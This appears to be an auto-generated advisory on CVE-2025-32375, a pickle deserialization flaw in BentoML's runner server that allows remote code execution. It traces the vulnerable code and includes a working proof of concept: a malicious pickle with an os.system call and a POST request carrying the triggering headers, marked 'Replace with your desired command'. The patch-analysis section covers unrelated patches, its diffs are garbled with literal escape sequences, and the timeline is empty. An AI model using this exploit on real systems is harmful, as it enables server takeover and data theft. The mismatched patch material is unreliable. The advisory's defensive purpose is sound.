CVE-2025-32375: Insecure Deserialization in BentoML Runner Server Leads to RCE

Executive Summary

CVE-2025-32375 describes a critical vulnerability in BentoML's runner server, stemming from insecure deserialization. By crafting malicious POST requests with specific headers, an attacker can achieve Remote Code Execution (RCE) on the server. This allows for unauthorized arbitrary code execution, potentially leading to initial access, information disclosure, and complete system compromise. The vulnerability arises from the unsafe use of pickle.loads() on attacker-controlled data.

Technical Details

Affected Systems:

  • BentoML runner server

Affected Software Versions:

  • All versions prior to the fix.

Affected Components:

  • src/bentoml/_internal/server/runner_app.py
  • src/bentoml/_internal/runner/container.py
  • src/bentoml/_internal/runner/utils.py

The vulnerability lies within the request handling logic of the BentoML runner server. Specifically, the _deserialize_single_param function in src/bentoml/_internal/server/runner_app.py processes request headers such as Payload-Container, Payload-Meta, and Batch-Size, combining them with the request body to construct a Payload object. This Payload is then passed through a series of functions, ultimately leading to the execution of pickle.loads() on the data contained within the request body.

Root Cause Analysis

The root cause of CVE-2025-32375 is the insecure use of Python's pickle.loads() function. pickle is a powerful serialization library, but it is inherently unsafe when used to deserialize data from untrusted sources. This is because a malicious pickle stream can contain arbitrary code that will be executed during the deserialization process.

The vulnerability occurs because the Payload-Container header determines which class's from_payload method is called. When Payload-Container is set to NdarrayContainer or PandasDataFrameContainer, and payload.meta["format"] is set to "default", the pickle.loads(payload.data) function is invoked. The payload.data is directly derived from the request body, which is controlled by the attacker.

Here's a breakdown of the vulnerable code paths:

  1. Request Handling: The _request_handler function in src/bentoml/_internal/server/runner_app.py is responsible for handling incoming requests.

    # src/bentoml/_internal/server/runner_app.py#L291-L298
    async def _request_handler(request: Request) -> Response:
        assert self._is_ready
    
        arg_num = int(request.headers["args-number"])
        r_: bytes = await request.body()
    
        if arg_num == 1:
            params: Params[t.Any] = _deserialize_single_param(request, r_)
    
  2. Deserialization: The _deserialize_single_param function extracts header values and the request body to create a Payload object.

    # src/bentoml/_internal/server/runner_app.py#L376-L393
    def _deserialize_single_param(request: Request, bs: bytes) -> Params[t.Any]:
        container = request.headers["Payload-Container"]
        meta = json.loads(request.headers["Payload-Meta"])
        batch_size = int(request.headers["Batch-Size"])
        kwarg_name = request.headers.get("Kwarg-Name")
        payload = Payload(
            data=bs,
            meta=meta,
            batch_size=batch_size,
            container=container,
        )
        if kwarg_name:
            d = {kwarg_name: payload}
            params: Params[t.Any] = Params(**d)
        else:
            params: Params[t.Any] = Params(payload)
    
        return params
    
  3. Inference: The infer function then processes the params object.

    # src/bentoml/_internal/server/runner_app.py#L303-L304
    try:
        payload = await infer(params)
    
  4. Payload Mapping: Inside infer, the params object's map function is called with AutoContainer.from_payload.

    # src/bentoml/_internal/server/runner_app.py#L278-L289
    async def infer(params: Params[t.Any]) -> Payload:
        params = params.map(AutoContainer.from_payload)
    
        try:
            ret = await runner_method.async_run(
                *params.args, **params.kwargs
            )
        except Exception:
            traceback.print_exc()
            raise
    
        return AutoContainer.to_payload(ret, 0)
    
  5. Container Selection: AutoContainer.from_payload determines the container class based on the Payload-Container header.

    # src/bentoml/_internal/runner/container.py#L710-L712
    def from_payload(cls, payload: Payload) -> t.Any:
        container_cls = DataContainerRegistry.find_by_name(payload.container)
        return container_cls.from_payload(payload)
    
  6. Unsafe Deserialization: Finally, the from_payload methods of NdarrayContainer and PandasDataFrameContainer call pickle.loads() if the "format" key in payload.meta is set to "default".

    # src/bentoml/_internal/runner/container.py#L411-L416
    def from_payload(
        cls,
        payload: Payload,
    ) -> ext.PdDataFrame:
        if payload.meta["format"] == "default":
            return pickle.loads(payload.data)
    
    # src/bentoml/_internal/runner/container.py#L306-L312
    def from_payload(
        cls,
        payload: Payload,
    ) -> ext.NpNDArray:
        format = payload.meta.get("format", "default")
        if format == "default":
            return pickle.loads(payload.data)
    

This direct deserialization of attacker-controlled data without proper sanitization is the core vulnerability.

Patch Analysis

Multiple patches were applied to address the vulnerability and improve the BentoML framework. Here's an analysis of the relevant patches:

  1. feat: implement bento arguments (#5299)

    This patch introduces the ability to override values of the Image from bentofile.yaml and implements bento arguments. While not directly addressing the insecure deserialization, it adds a new feature that could potentially be misused if not handled carefully.

    File: src/_bentoml_impl/server/serving.py
    --- a/src/_bentoml_impl/server/serving.py
    +++ b/src/_bentoml_impl/server/serving.py
    @@ -92,6 +92,7 @@ def _get_server_socket(
     _SERVICE_WORKER_SCRIPT = "_bentoml_impl.worker.service"
     
     
    +@inject
     def create_dependency_watcher(
         bento_identifier: str,
         svc: AnyService,
    @@ -101,6 +102,7 @@ def create_dependency_watcher(
         scheduler: ResourceAllocator,
         working_dir: str | None = None,
         env: dict[str, str] | None = None,
    +    bento_args: dict[str, t.Any] = Provide[BentoMLContainer.bento_arguments],
     ) -> tuple[Watcher, CircusSocket, str]:
         from bentoml.serving import create_watcher
     
    @@ -116,6 +118,8 @@ def create_dependency_watcher(
             f"$(circus.sockets.{svc.name})",
             "--worker-id",
             "$(CIRCUS.WID)",
    +        "--args",
    +        json.dumps(bento_args),
         ]
     
         if worker_envs:
    @@ -306,6 +310,7 @@ def serve_http(
                 timeout_graceful_shutdown=timeout_graceful_shutdown,
             )
             timeout_args = ["--timeout", str(timeout)] if timeout else []
    +        bento_args = BentoMLContainer.bento_arguments.get()
     
             server_args = [
                 "-m",
    @@ -319,6 +324,8 @@ def serve_http(
                 str(backlog),
                 "--worker-id",
                 "$(CIRCUS.WID)",
    +            "--args",
    +            json.dumps(bento_args),
                 *ssl_args,
                 *timeouts_args,
                 *timeout_args,
    

    This code introduces the concept of bento_args, which are arguments passed to the BentoML service. These arguments are serialized as JSON and passed to the worker processes. While JSON serialization is generally safer than pickle, it's important to ensure that these arguments are properly validated and sanitized to prevent other types of vulnerabilities.

    The @inject decorator and Provide[BentoMLContainer.bento_arguments] indicate that these arguments are managed by the dependency injection system, allowing for flexible configuration and overriding of values.

  2. fix: remove start commands from CLI (#5303)

    This patch removes the start commands from the CLI and redirects them to internal modules. This change aims to simplify the CLI and improve the internal structure of BentoML.

    File: src/bentoml/_internal/container/frontend/dockerfile/entrypoint.sh
    --- a/src/bentoml/_internal/container/frontend/dockerfile/entrypoint.sh
    +++ b/src/bentoml/_internal/container/frontend/dockerfile/entrypoint.sh
    @@ -18,36 +18,39 @@ _main() {
     	# For backwards compatibility with the yatai<1.0.0, adapting the old "yatai" command to the new "start" command.
     	if [ "${#}" -gt 0 ] && [ "${1}" = \'python\' ] && [ "${2}" = \'-m\' ] && { [ "${3}" = \'bentoml._internal.server.cli.runner\' ] || [ "${3}" = "bentoml._internal.server.cli.api_server" ]; }; then # SC2235, use { } to avoid subshell overhead
     		if [ "${3}" = \'bentoml._internal.server.cli.runner\' ]; then
    -			set -- bentoml start-runner-server "${@:4}"
    +			set -- python -m bentoml_cli._internal.start start-runner-server "${@:4}"
     		elif [ "${3}" = \'bentoml._internal.server.cli.api_server\' ]; then
    -			set -- bentoml start-http-server "${@:4}"
    +			set -- python -m bentoml_cli._internal.start start-http-server "${@:4}"
     		fi
    +    # Redirect start-* commands to the internal modules.\n    elif [ "${#}" -gt 0 ] && { [ "${1}" = \'start-http-server\' ] || [ "${1}" = \'start-grpc-server\' ] || [ "${1}" = \'start-runner-server\' ]; }; then\n        set -- python -m bentoml_cli._internal.start "${@:1}" "$BENTO_PATH"\n     	# If no arg or first arg looks like a flag.\n     elif [[ "$#" -eq 0 ]] || [[ "${1:0:1}" =~ \'-\' ]]; then
     		# This is provided for backwards compatibility with places where user may have
     		# discover this easter egg and use it in their scripts to run the container.
     		if [[ -v BENTOML_SERVE_COMPONENT ]]; then
     			echo "\\$BENTOML_SERVE_COMPONENT is set! Calling \'bentoml start-*\' instead"\n
     			if [ "${BENTOML_SERVE_COMPONENT}" = \'http_server\' ]; then
    -				set -- bentoml start-http-server "$@" "$BENTO_PATH"\
    +				set -- python -m bentoml_cli._internal.start start-http-server "$@" "$BENTO_PATH"\
     			elif [ "${BENTOML_SERVE_COMPONENT}" = \'grpc_server\' ]; then
    -				set -- bentoml start-grpc-server "$@" "$BENTO_PATH"\
    +				set -- python -m bentoml_cli._internal.start start-grpc-server "$@" "$BENTO_PATH"\
     			elif [ "${BENTOML_SERVE_COMPONENT}" = \'runner\' ]; then
    -				set -- bentoml start-runner-server "$@" "$BENTO_PATH"\
    +				set -- python -m bentoml_cli._internal.start start-runner-server "$@" "$BENTO_PATH"\
     			fi
     		else
     			set -- bentoml serve "$@" "$BENTO_PATH"\
     		fi
     	fi
    +	# Override the BENTOML_PORT if PORT env var is present. Used for Heroku and Yatai.\n    if [[ -v PORT ]]; then\n    		echo "\\$PORT is set! Overriding \\$BENTOML_PORT with \\$PORT ($PORT)"\n    		export BENTOML_PORT=$PORT\n    	fi\n    	# Handle serve and start commands that is passed to the container.\n    	# Assuming that serve and start commands are the first arguments\n    	# Note that this is the recommended way going forward to run all bentoml containers.\n    -	if [ "${#}" -gt 0 ] && { [ "${1}" = \'serve\' ] || [ "${1}" = \'serve-http\' ] || [ "${1}" = \'serve-grpc\' ] || [ "${1}" = \'start-http-server\' ] || [ "${1}" = \'start-grpc-server\' ] || [ "${1}" = \'start-runner-server\' ]; }; then\n    +	if [ "${#}" -gt 0 ] && { [ "${1}" = \'serve\' ] || [ "${1}" = \'serve-http\' ] || [ "${1}" = \'serve-grpc\' ]; }; then
     		exec bentoml "$@" "$BENTO_PATH"\n     	else\n     		# otherwise default to run whatever the command is
    

    This patch doesn't directly address the insecure deserialization vulnerability but changes how the server is started, potentially affecting the attack surface. By redirecting the start-* commands to internal modules, the attack surface might be reduced, or at least the entry points for exploitation might change.

  3. feat: make it possible to override values of Image from bentofile.yaml (#5298)

    This patch allows overriding values of the Image from bentofile.yaml. This change introduces more flexibility in configuring the BentoML environment but also requires careful validation to prevent malicious configurations.

    File: src/_bentoml_sdk/images.py
    --- a/src/_bentoml_sdk/images.py
    +++ b/src/_bentoml_sdk/images.py
    @@ -41,7 +41,8 @@
     class Image:\n    """A class defining the environment requirements for bento."""\n \n-    base_image: str\n+    base_image: str = ""\n+    distro: str = "debian"\n    python_version: str = DEFAULT_PYTHON_VERSION\n    commands: t.List[str] = attrs.field(factory=list)\n    lock_python_packages: bool = True\n    @@ -243,7 +274,11 @@ def _freeze_python_requirements(\n                cwd=bento_fs.getsyspath(py_folder),\n            )\n        except subprocess.CalledProcessError as e:\n-            raise BentoMLException(f"Failed to lock PyPI packages: {e}") from None\n+            raise BentoMLException(\n+                "Failed to lock PyPI packages. Add `--debug` option to see more details.\\n"\n+                "You see this error because you set `lock_packages=true` in the image config.\\n"\n+                "Learn more at https://docs.bentoml.com/en/latest/reference/bentoml/bento-build-options.html#pypi-package-locking"\n+            ) from e\n        locked_requirements = (  # uv doesn\'t preserve global option lines, add them here\n            "\\n".join(option.dumps() for option in requirements_file.options)\n        )\n
    

    This patch modifies the Image class to allow setting the base image and distro. It also updates the error message when locking PyPI packages fails, providing more information to the user. While these changes don't directly address the insecure deserialization, they improve the configurability of BentoML and provide better error messages.

Theoretical Fixes:

Given the root cause, the primary fix would involve removing or replacing the insecure pickle.loads() call. Here are a few potential strategies:

  1. Use a Safe Serialization Format: Replace pickle with a safer serialization format like JSON or Protocol Buffers. This would require changing the Content-Type header and the corresponding deserialization logic.

  2. Input Validation and Sanitization: If pickle is necessary for some reason, implement strict input validation and sanitization. This could involve whitelisting allowed classes or data structures and rejecting any input that does not conform to the expected format.

  3. Sandboxing: Execute the pickle.loads() call within a sandboxed environment with limited privileges. This would prevent the attacker from gaining full control of the system even if they are able to execute arbitrary code.

  4. Authentication and Authorization: Implement robust authentication and authorization mechanisms to ensure that only trusted users can send requests to the runner server.

A theoretical patch to src/bentoml/_internal/runner/container.py might look like this:

--- a/src/bentoml/_internal/runner/container.py
+++ b/src/bentoml/_internal/runner/container.py
@@ -303,10 +303,13 @@
     cls,
     payload: Payload,
 ) -> ext.NpNDArray:
-    format = payload.meta.get("format", "default")
-    if format == "default":
-        return pickle.loads(payload.data)
+    if payload.meta.get("format") == "default":
+        # Replace pickle.loads with a safer alternative, e.g., JSON
+        try:
+            import json
+            return json.loads(payload.data.decode('utf-8'))
+        except json.JSONDecodeError:
+            raise ValueError("Invalid JSON data")
+    else:
+        raise ValueError("Unsupported format")

This theoretical patch replaces pickle.loads with json.loads, requiring the client to send JSON-encoded data instead of pickled data. It also adds error handling for invalid JSON data and unsupported formats. This would mitigate the RCE vulnerability by preventing the execution of arbitrary code during deserialization.

Exploitation Techniques

An attacker can exploit CVE-2025-32375 by sending a crafted POST request to the BentoML runner server. The request must include the following headers:

  • args-number: 1
  • Content-Type: application/vnd.bentoml.pickled
  • Payload-Container: NdarrayContainer (or PandasDataFrameContainer)
  • Payload-Meta: {"format": "default"}
  • Batch-Size: -1

The request body should contain a malicious pickle payload that executes arbitrary code.

Here's a step-by-step Proof of Concept (PoC) example:

  1. Create a malicious pickle payload:

    import pickle
    import base64
    
    class RCE:
        def __reduce__(self):
            import os
            return (os.system, ('touch /tmp/pwned',)) # Replace with your desired command
    
    payload = pickle.dumps(RCE())
    payload_b64 = base64.b64encode(payload).decode()
    
    print(f"Pickle Payload (Base64 Encoded): {payload_b64}")
    

    This code creates a Python class RCE with a __reduce__ method that executes the touch /tmp/pwned command. The pickle.dumps() function serializes this class into a pickle payload, and the base64.b64encode() function encodes it in Base64 for easier transmission.

  2. Send the crafted POST request:

    import requests
    import base64
    
    url = "http://0.0.0.0:8888/"
    
    # Create a malicious pickle payload (same as above)
    class RCE:
        def __reduce__(self):
            import os
            return (os.system, ('touch /tmp/pwned',)) # Replace with your desired command
    
    payload = pickle.dumps(RCE())
    
    headers = {
        "args-number": "1",
        "Content-Type": "application/vnd.bentoml.pickled",
        "Payload-Container": "NdarrayContainer",
        "Payload-Meta": '{"format": "default"}',
        "Batch-Size": "-1",
    }
    
    response = requests.post(url, headers=headers, data=payload)
    
    print(response.status_code)
    print(response.content)
    

    This code sends a POST request to the BentoML runner server with the crafted headers and the malicious pickle payload in the request body. If the exploit is successful, the touch /tmp/pwned command will be executed on the server, creating a file named /tmp/pwned.

Attack Scenarios:

  • Remote Code Execution: An attacker can execute arbitrary code on the server, potentially gaining full control of the system.
  • Information Disclosure: An attacker can access sensitive data stored on the server, such as API keys, database credentials, and customer data.
  • Denial of Service: An attacker can crash the server by sending a malicious pickle payload that causes an exception.
  • Lateral Movement: If the server is part of a larger network, an attacker can use it as a stepping stone to gain access to other systems.

Real-World Impacts:

  • Compromised Machine Learning Models: An attacker could modify or replace machine learning models, leading to incorrect predictions or biased results.
  • Data Breach: An attacker could steal sensitive data used by the machine learning models, such as customer data or financial information.
  • Supply Chain Attacks: An attacker could inject malicious code into the BentoML deployment pipeline, compromising the entire machine learning supply chain.

Mitigation Strategies

To mitigate CVE-2025-32375, the following strategies are recommended:

  1. Upgrade to the latest version of BentoML: Upgrade to a version of BentoML that includes a fix for this vulnerability.

  2. Disable or Replace Pickle Deserialization: If possible, disable or replace the use of pickle.loads() in the runner server. Use a safer serialization format like JSON or Protocol Buffers instead.

  3. Input Validation: Implement strict input validation to ensure that only trusted data is deserialized. Whitelist allowed classes or data structures and reject any input that does not conform to the expected format.

  4. Network Segmentation: Isolate the BentoML runner server from other systems on the network. This will limit the impact of a successful attack.

  5. Least Privilege: Run the BentoML runner server with the least privileges necessary. This will limit the attacker's ability to perform actions on the system.

  6. Web Application Firewall (WAF): Deploy a WAF to filter out malicious requests before they reach the BentoML runner server. The WAF can be configured to block requests with suspicious headers or payloads.

  7. Regular Security Audits: Conduct regular security audits of the BentoML deployment to identify and address any vulnerabilities.

  8. Monitor for Suspicious Activity: Implement monitoring and alerting to detect suspicious activity on the BentoML runner server. This could include unusual network traffic, unexpected process execution, or unauthorized access attempts.

Configuration Changes:

  • If using a custom bentofile.yaml, ensure that the image configuration does not allow for arbitrary base images or distros.
  • Review and restrict the use of BentoML arguments to prevent malicious configurations.

Security Best Practices:

  • Follow the principle of least privilege when configuring the BentoML environment.
  • Keep all software components up to date with the latest security patches.
  • Implement strong authentication and authorization mechanisms.
  • Regularly review and update security policies and procedures.

Timeline of Discovery and Disclosure

  • Public Disclosure: CVE-2025-32375 was publicly disclosed.

References

Read more